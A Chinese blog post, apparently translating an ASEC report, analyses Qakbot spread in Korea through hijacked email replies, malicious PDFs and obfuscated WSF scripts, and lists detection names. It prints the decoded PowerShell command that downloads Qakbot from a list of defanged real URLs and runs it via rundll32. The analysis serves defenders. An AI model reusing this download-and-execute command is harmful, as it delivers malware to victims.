Eswlnk Blog Eswlnk Blog
  • 资源
    • 精彩视频
    • 破解专区
      • WHMCS
      • WordPress主题
      • WordPress插件
    • 其他分享
    • 极惠VPS
    • PDF资源
  • 关于我
    • 论文阅读
    • 关于本站
    • 通知
    • 左邻右舍
    • 玩物志趣
    • 日志
    • 专题
  • 热议话题
    • 游戏资讯
  • 红黑
    • 渗透分析
    • 攻防对抗
    • 代码发布
  • 自主研发
    • 知识库
    • 插件
      • ToolBox
      • HotSpot AI 热点创作
    • 区块
    • 快乐屋
    • 卡密
  • 乱步
    • 文章榜单
    • 热门标签
  • 问答中心反馈
  • 注册
  • 登录
首页 › 热议话题 › Qakbot 通过电子邮件劫持在韩国传播

Qakbot 通过电子邮件劫持在韩国传播

Eswlnk的头像
Eswlnk
2023-04-16 15:58:01
Qakbot 通过电子邮件劫持在韩国传播-Eswlnk Blog
智能摘要 AI
安全应急响应中心(ASEC)发现Qakbot银行木马通过恶意PDF文件附于转发或回复电子邮件中传播。这些邮件伪装成正常回复,利用原始邮件的收件人和抄送名单作为目标,文件名看似随机生成,如“UT.PDF”。点击PDF中的“打开”按钮后,用户会被重定向至恶意网址,下载并解压受密码保护的ZIP文件,最终执行WSF文件,通过PowerShell下载并运行Qakbot二进制文件。此类攻击已持续多年,建议用户谨慎处理不明来源邮件,并保持杀毒软件更新。相关检测项包括Phishing/PDF.Agent、Trojan/WSF.PSRunner等。

安全应急响应中心(ASEC)发现了 Qakbot 通过恶意 PDF 文件附加到转发或回复现有电子邮件的方式进行传播。

Qakbot 银行木马一直在通过各种媒介持续分发。 ASEC 涵盖了 Qakbot 在过去几年中的分发趋势。

如下所示,分发的电子邮件采用被劫持的普通电子邮件的形式,以附加恶意文件的方式向目标用户发送回复,并使用原始电子邮件的收件人和抄送名单作为收件人地址。

原始电子邮件发送日期差异很大,从2018年到2022年不等,表明它们并不是来自最近的时间。回复中的正文和附件与原始电子邮件无关,但它们包含提示用户打开附件的消息。

接收到此类电子邮件的用户可能会打开附件,认为它是正常的回复,因此建议谨慎对待。

Qakbot 通过电子邮件劫持在韩国传播-Eswlnk Blog
Qakbot 通过电子邮件劫持在韩国传播-Eswlnk Blog

电子邮件附加的 PDF 文件的文件名使用随机字符,例如“UT.PDF”,“RA.PDF”和“NM.PDF”,看起来是通过自动化生成的。打开 PDF 文件时,会显示包含 Microsoft Azure 徽标和诱使用户单击“打开”按钮的消息的页面,如下所示。

单击“打开”按钮后,用户将被重定向到一个恶意网址,建立连接后,将下载受密码保护的压缩 ZIP 文件。可以使用 PDF 文件中写有“密码:755”的密码解压此密码保护的 ZIP 文件。

Qakbot 通过电子邮件劫持在韩国传播-Eswlnk Blog

解压缩后生成的 WSF 文件调查显示,WSF 文件中包含了一个脚本代码,该代码已被混淆处理以绕过杀毒软件的检测,如下所示。有意义的脚本代码位于<job>标记之后。

Qakbot 通过电子邮件劫持在韩国传播-Eswlnk Blog

执行 WSF 文件时,通过 PowerShell 进程执行了一个已加密的数据命令。解密此数据后得到以下结果。Qakbot 二进制文件以文件名 undersluice.Calctuffs 的形式从有效的网址下载到临时目录中,并通过 rundll32.exe 进程执行。

powershell.exe” -ENC “Start-Sleep -Seconds 2; $Girnie = (“hxxp://milleniuninformatica.com[.]br/Le9/jGjSkvEqmXp,hxxps://qassimnews[.]com/yweNej/kQBDu,hxxps://stealingexcellence[.]com/rVR9r/yahxNk,hxxps://medano355condominio[.]com/Tt7l/OwZd8xdlWjil,hxxps://choicefaz.com[.]br/w1W2/4gPNeUm0J,hxxps://t-lows[.]com/ggAJ2m/kXpW59tm,hxxps://seicas[.]com/KvtM0/Uj3atvfT4E,hxxps://farmfutures[.]in/tlUtBc/IYj0K1,hxxps://alzheimersdigest[.]net/ZKpva/55C63K,hxxps://antoinettegabriel[.]com/YuUE/RQwyJWR2jjc”).split(“,”); foreach ($reflexional in $Girnie) {try {wget $reflexional -TimeoutSec 17 -O $env:TEMP\undersluice.Calctuffs;if ((Get-Item $env:TEMP\undersluice.Calctuffs).length -ge 100000) {start rundll32 $env:TEMP\\undersluice.Calctuffs,X555;break;}} catch {Start-Sleep -Seconds 2;}}

目前该网址不可用,但内部和外部基础设施显示,当可以连接到该网址时,Qakbot 二进制文件已从该网址分发。

类似格式的多个恶意电子邮件也正在被分发。用户必须谨慎打开来自未知来源的电子邮件,并更新其杀毒软件至最新版本。

文件检测

  • Phishing/PDF.Agent (2023.04.07.02)
  • Phishing/PDF.Generic (2023.04.07.03)
  • Phishing/PDF.Malurl (2023.04.08.00)
  • Trojan/WSF.PSRunner (2023.04.08.00)
  • Trojan/Win.Evo- gen.C5403438 (2023.03.31.02)
  • Trojan/Win.Qakbot.C5406010 (2023.04.06.02)
  • Trojan/Win.Evo-gen.C5406771 (2023.04.07.02)
本站默认网盘访问密码:1166
本站默认网盘访问密码:1166
劫持木马网络攻防
0
Eswlnk的头像
Eswlnk
一个有点倒霉的研究牲站长
赞赏
节点更新:LightCDN 亚太地区新增 3 个节点
上一篇
苹果相册总是有垃圾邀请怎么办?如何处理相册垃圾邀请?
下一篇

猜你喜欢

  • 漏洞资讯:Ollama 未授权访问漏洞分析与防护指南
  • 「漏洞资讯」Windows TCP/IP 远程代码执行漏洞 | CVE-2024-38063
  • 「科技资讯」如何完美开启华为手机无线充电?全方面指南与问题解决方案
  • 「漏洞资讯」CVE-2024-38077 的漏洞利用概念验证(PoC)代码发布
  • 「高危漏洞」OpenSSH远程代码执行漏洞(CVE-2024-6387)安全风险通告
Eswlnk的头像

Eswlnk

一个有点倒霉的研究牲站长
1108
文章
319
评论
679
获赞

随便看看

各位站长注意啦!2023年第一次四川省网站备案核查通知
2023-06-11 1:31:36
2024年研招考试报名信息成都信息工程大学考点网上确认公告 | 航空港校区考点(5121)和龙泉校区考点(5169)
2023-10-30 12:59:01
「原创教程」自制 LED 灯泡让您的昼夜节律保持稳定
2022-11-25 23:03:24

专题展示

WordPress53

工程实践37

热门标签

360 AI API CDN java linux Nginx PDF PHP python SEO Windows WordPress 云服务器 云服务器知识 代码 免费 安全 安卓 工具 开发日志 微信 微软 手机 插件 攻防 攻防对抗 教程 日志 渗透分析 源码 漏洞 电脑 破解 系统 编程 网站优化 网络 网络安全 脚本 苹果 谷歌 软件 运维 逆向
  • 首页
  • 知识库
  • 地图
Copyright © 2023-2025 Eswlnk Blog. Designed by XiaoWu.
本站CDN由 壹盾安全 提供高防CDN安全防护服务
蜀ICP备20002650号-10
页面生成用时 0.957 秒   |  SQL查询 26 次
本站勉强运行:
友情链接: Eswlnk Blog 网站渗透 倦意博客 特资啦!个人资源分享站 祭夜博客 iBAAO壹宝头条
  • WordPress142
  • 网络安全64
  • 漏洞52
  • 软件52
  • 安全48
现在登录
  • 资源
    • 精彩视频
    • 破解专区
      • WHMCS
      • WordPress主题
      • WordPress插件
    • 其他分享
    • 极惠VPS
    • PDF资源
  • 关于我
    • 论文阅读
    • 关于本站
    • 通知
    • 左邻右舍
    • 玩物志趣
    • 日志
    • 专题
  • 热议话题
    • 游戏资讯
  • 红黑
    • 渗透分析
    • 攻防对抗
    • 代码发布
  • 自主研发
    • 知识库
    • 插件
      • ToolBox
      • HotSpot AI 热点创作
    • 区块
    • 快乐屋
    • 卡密
  • 乱步
    • 文章榜单
    • 热门标签
  • 问答中心反馈